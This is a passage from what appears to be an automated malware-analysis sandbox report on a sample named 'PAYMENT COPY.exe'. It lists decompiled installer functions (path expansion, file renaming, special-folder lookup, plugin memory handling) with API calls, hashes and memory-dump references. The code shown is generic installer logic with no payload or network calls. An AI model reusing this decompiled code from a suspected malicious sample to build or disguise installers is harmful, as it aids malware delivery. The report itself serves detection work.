                                                                    0x00405fe7
                                                                    0x00405fe9
                                                                    0x00000000
                                                                    0x00405fe9
                                                                    0x00405fb3
                                                                    0x00405fb9
                                                                    0x00000000
                                                                    0x00405fb9
                                                                    0x00405f85
                                                                    0x00405f63
                                                                    0x00405ee2
                                                                    0x00405eed
                                                                    0x00405ef6
                                                                    0x00405efa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405efa
                                                                    0x0040602b

                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040604D,?,?), ref: 00405EED
                                                                    • GetShortPathNameA.KERNEL32 ref: 00405EF6
                                                                      • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                      • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                    • GetShortPathNameA.KERNEL32 ref: 00405F13
                                                                    • wsprintfA.USER32 ref: 00405F31
                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
                                                                    • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
                                                                    • GlobalFree.KERNEL32 ref: 0040601A
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406021
                                                                      • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\PAYMENT COPY.exe,80000000,00000003), ref: 00405DEA
                                                                      • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                    • String ID: %s=%s$[Rename]
                                                                    • API String ID: 2171350718-1727408572
                                                                    • Opcode ID: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
                                                                    • Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
                                                                    • Opcode Fuzzy Hash: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
                                                                    • Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004062E0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ec1c; // 0x53b4aa
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f498;
				_t39 = 0x42e3e0;
				_t90 = 0x42e3e0;
				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E004061AB(_t90,  *0x42f448);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406528(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f44c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4e4;
						if( *0x42f4e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f444;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062E0(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E0040624D(_a4, _t39);
			}



























                                                                    0x004062e0
                                                                    0x004062e0
                                                                    0x004062e0
                                                                    0x004062e6
                                                                    0x004062eb
                                                                    0x004062ed
                                                                    0x004062fc
                                                                    0x004062fc
                                                                    0x00406304
                                                                    0x00406305
                                                                    0x00406306
                                                                    0x00406307
                                                                    0x0040630a
                                                                    0x00406312
                                                                    0x00406314
                                                                    0x0040632b
                                                                    0x0040632e
                                                                    0x0040632e
                                                                    0x00406505
                                                                    0x00406505
                                                                    0x00406509
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040633b
                                                                    0x00406341
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406347
                                                                    0x00406348
                                                                    0x0040634b
                                                                    0x0040634e
                                                                    0x004064f8
                                                                    0x00406502
                                                                    0x00406504
                                                                    0x00406504
                                                                    0x004064fa
                                                                    0x004064fc
                                                                    0x004064fe
                                                                    0x004064ff
                                                                    0x004064ff
                                                                    0x00000000
                                                                    0x004064f8
                                                                    0x00406354
                                                                    0x00406358
                                                                    0x00406368
                                                                    0x0040636f
                                                                    0x00406372
                                                                    0x0040637a
                                                                    0x0040637d
                                                                    0x00406384
                                                                    0x00406385
                                                                    0x00406388
                                                                    0x004064a5
                                                                    0x004064a8
                                                                    0x004064d8
                                                                    0x004064db
                                                                    0x004064e0
                                                                    0x004064e4
                                                                    0x004064e4
                                                                    0x004064e9
                                                                    0x004064ef
                                                                    0x004064f1
                                                                    0x00000000
                                                                    0x004064f1
                                                                    0x004064aa
                                                                    0x004064ad
                                                                    0x004064c2
                                                                    0x004064c9
                                                                    0x004064af
                                                                    0x004064b6
                                                                    0x004064b6
                                                                    0x004064d1
                                                                    0x004064d4
                                                                    0x0040649d
                                                                    0x0040649e
                                                                    0x0040649e
                                                                    0x00000000
                                                                    0x004064d4
                                                                    0x0040638e
                                                                    0x00406395
                                                                    0x00406397
                                                                    0x00406398
                                                                    0x004063b2
                                                                    0x004063b2
                                                                    0x004063b9
                                                                    0x004063b9
                                                                    0x004063c0
                                                                    0x004063c4
                                                                    0x004063c4
                                                                    0x004063c5
                                                                    0x004063c7
                                                                    0x00406400
                                                                    0x00406403
                                                                    0x00406413
                                                                    0x00406416
                                                                    0x0040641e
                                                                    0x00406424
                                                                    0x00406424
                                                                    0x00406483
                                                                    0x00406483
                                                                    0x00406485
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406428
                                                                    0x0040642f
                                                                    0x00406430
                                                                    0x00406432
                                                                    0x0040644c
                                                                    0x0040645a
                                                                    0x00406460
                                                                    0x00406462
                                                                    0x00406480
                                                                    0x00406480
                                                                    0x00406480
                                                                    0x00000000
                                                                    0x00406480
                                                                    0x00406468
                                                                    0x00406471
                                                                    0x00406474
                                                                    0x0040647a
                                                                    0x0040647e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040647e
                                                                    0x00406434
                                                                    0x00406437
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406446
                                                                    0x00406448
                                                                    0x0040644a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040644a
                                                                    0x00000000
                                                                    0x00406483
                                                                    0x0040640b
                                                                    0x00000000
                                                                    0x004063c9
                                                                    0x004063e4
                                                                    0x004063e9
                                                                    0x004063ec
                                                                    0x0040648c
                                                                    0x0040648c
                                                                    0x00406490
                                                                    0x00406498
                                                                    0x00406498
                                                                    0x00000000
                                                                    0x00406490
                                                                    0x004063f6
                                                                    0x00406487
                                                                    0x00406487
                                                                    0x0040648a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040648a
                                                                    0x004063c7
                                                                    0x0040639a
                                                                    0x0040639e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004063a0
                                                                    0x004063a4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004063a6
                                                                    0x004063aa
                                                                    0x00000000
                                                                    0x004063ac
                                                                    0x004063ac
                                                                    0x00000000
                                                                    0x004063ac
                                                                    0x004063aa
                                                                    0x0040650f
                                                                    0x00406519
                                                                    0x00406525
                                                                    0x00406525
                                                                    0x00000000

                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32 ref: 0040640B
                                                                    • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
                                                                    • SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040645A
                                                                    • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406468
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00406474
                                                                    • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
                                                                    • lstrlenA.KERNEL32(Call,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 717251189-1230650788
                                                                    • Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                    • Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
                                                                    • Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                    • Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 735824D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E735824D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E73581215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M73582626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x7358307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7358309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73581429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x7358405c);
								goto L17;
							case 4:
								__ecx =  *0x7358405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x7358405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x7358405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x73584000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E735812D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E73581266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}














                                                                    0x735824e4
                                                                    0x735824e6
                                                                    0x735824f0
                                                                    0x735824f6
                                                                    0x73582500
                                                                    0x73582504
                                                                    0x73582509
                                                                    0x73582509
                                                                    0x73582511
                                                                    0x73582518
                                                                    0x7358251e
                                                                    0x00000000
                                                                    0x73582525
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x7358252c
                                                                    0x73582530
                                                                    0x73582533
                                                                    0x73582537
                                                                    0x7358253e
                                                                    0x73582542
                                                                    0x73582548
                                                                    0x7358254a
                                                                    0x7358254c
                                                                    0x7358254c
                                                                    0x73582553
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x7358255c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x7358256c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73582598
                                                                    0x735825a0
                                                                    0x735825aa
                                                                    0x735825ac
                                                                    0x735825b1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73582574
                                                                    0x73582578
                                                                    0x7358257a
                                                                    0x7358257b
                                                                    0x7358257d
                                                                    0x7358258d
                                                                    0x73582594
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x735825b7
                                                                    0x735825b9
                                                                    0x735825bf
                                                                    0x735825c5
                                                                    0x735825c5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x7358251e
                                                                    0x735825c8
                                                                    0x735825c8
                                                                    0x735825cd
                                                                    0x735825de
                                                                    0x735825de
                                                                    0x735825e4
                                                                    0x735825e9
                                                                    0x735825ee
                                                                    0x735825fa
                                                                    0x735825ff
                                                                    0x00000000
                                                                    0x73582604
                                                                    0x735825f0
                                                                    0x735825f1
                                                                    0x73582605
                                                                    0x73582605
                                                                    0x735825ee
                                                                    0x73582606
                                                                    0x7358260a
                                                                    0x7358260d
                                                                    0x73582625

                                                                    APIs
                                                                      • Part of subcall function 73581215: GlobalAlloc.KERNEL32(00000040,73581233,?,735812CF,-7358404B,735811AB,-000000A0), ref: 7358121D
                                                                    • GlobalFree.KERNEL32 ref: 735825DE
                                                                    • GlobalFree.KERNEL32 ref: 73582618
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242471104.0000000073581000.00000020.00020000.sdmp, Offset: 73580000, based on PE: true
                                                                    • Associated: 00000000.00000002.242447030.0000000073580000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242513496.0000000073583000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242533114.0000000073585000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Global$Free$Alloc
                                                                    • String ID: {s@us
                                                                    • API String ID: 1780285237-2578703795
                                                                    • Opcode ID: 4a4d5ee497051d1cddc3db259153f2cd9afa2fbd33062a0a73b3ffc5ca2254bd
                                                                    • Instruction ID: 34777a4b90c29d868859b351fafff300c6b427efa258141df114a496ad8e0474
                                                                    • Opcode Fuzzy Hash: 4a4d5ee497051d1cddc3db259153f2cd9afa2fbd33062a0a73b3ffc5ca2254bd
                                                                    • Instruction Fuzzy Hash: E8411172145208EFD302EF55EC98EEB7FBAEB85300B24492DF5469B240DB35A905CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 735822F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E735822F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E735812AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E7358123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M7358247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E735812FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E735812FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E73581224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x7358405c =  *0x7358405c +  *0x7358405c;
									__edi = GlobalAlloc(0x40,  *0x7358405c +  *0x7358405c);
									 *0x7358405c = MultiByteToWideChar(0, 0, __ebx,  *0x7358405c, __edi,  *0x7358405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E735812FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x7358405c;
									__esi = __esi +  *0x73584064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E73581429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E73581224(0x73584034);
					goto L10;
				}
			}












                                                                    0x73582306
                                                                    0x7358230a
                                                                    0x73582315
                                                                    0x73582315
                                                                    0x7358231c
                                                                    0x73582321
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73582325
                                                                    0x73582328
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x7358232d
                                                                    0x73582338
                                                                    0x73582348
                                                                    0x7358233f
                                                                    0x73582341
                                                                    0x73582357
                                                                    0x73582357
                                                                    0x00000000
                                                                    0x7358232f
                                                                    0x7358232f
                                                                    0x73582358
                                                                    0x7358235c
                                                                    0x7358235e
                                                                    0x7358235e
                                                                    0x73582361
                                                                    0x73582361
                                                                    0x73582369
                                                                    0x7358236c
                                                                    0x73582373
                                                                    0x73582377
                                                                    0x73582446
                                                                    0x73582447
                                                                    0x73582452
                                                                    0x7358247d
                                                                    0x7358247d
                                                                    0x73582462
                                                                    0x7358246e
                                                                    0x73582464
                                                                    0x73582464
                                                                    0x73582464
                                                                    0x00000000
                                                                    0x7358237d
                                                                    0x7358237d
                                                                    0x00000000
                                                                    0x73582384
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x7358238d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x7358239b
                                                                    0x7358239e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x735823a7
                                                                    0x735823ac
                                                                    0x735823af
                                                                    0x735823b0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x735823bd
                                                                    0x735823c8
                                                                    0x735823d7
                                                                    0x735823e2
                                                                    0x73582405
                                                                    0x73582408
                                                                    0x735823e4
                                                                    0x735823e8
                                                                    0x735823ee
                                                                    0x735823ef
                                                                    0x735823f2
                                                                    0x735823f3
                                                                    0x735823f6
                                                                    0x735823fd
                                                                    0x735823fd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73582410
                                                                    0x73582413
                                                                    0x7358241f
                                                                    0x73582421
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73582424
                                                                    0x73582427
                                                                    0x73582428
                                                                    0x7358242f
                                                                    0x73582436
                                                                    0x73582439
                                                                    0x7358243b
                                                                    0x7358243e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x7358237d
                                                                    0x73582377
                                                                    0x7358234d
                                                                    0x73582352
                                                                    0x00000000
                                                                    0x73582352

                                                                    APIs
                                                                    • GlobalFree.KERNEL32 ref: 73582447
                                                                      • Part of subcall function 73581224: lstrcpynA.KERNEL32(00000000,?,735812CF,-7358404B,735811AB,-000000A0), ref: 73581234
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 735823C2
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 735823D7
                                                                    • GlobalAlloc.KERNEL32(00000040,00000010), ref: 735823E8
                                                                    • CLSIDFromString.OLE32(00000000,00000000), ref: 735823F6
                                                                    • GlobalFree.KERNEL32 ref: 735823FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242471104.0000000073581000.00000020.00020000.sdmp, Offset: 73580000, based on PE: true
                                                                    • Associated: 00000000.00000002.242447030.0000000073580000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242513496.0000000073583000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242533114.0000000073585000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                    • String ID: @us
                                                                    • API String ID: 3730416702-1473371200
                                                                    • Opcode ID: a1a3871d42407e9b818cf0ac39bf5e9fdd93d53bc806ab267df8b9767b059b4e
                                                                    • Instruction ID: 37d3160b2323e60ec15b312a94f087826597e02ab51cfe31be33a50df559b14e
                                                                    • Opcode Fuzzy Hash: a1a3871d42407e9b818cf0ac39bf5e9fdd93d53bc806ab267df8b9767b059b4e
                                                                    • Instruction Fuzzy Hash: 0641AFB2504349EFE311AF25A844FEABBF8FF40311F10491AF98ADB190EB309545CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406528, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00406528(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C52(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
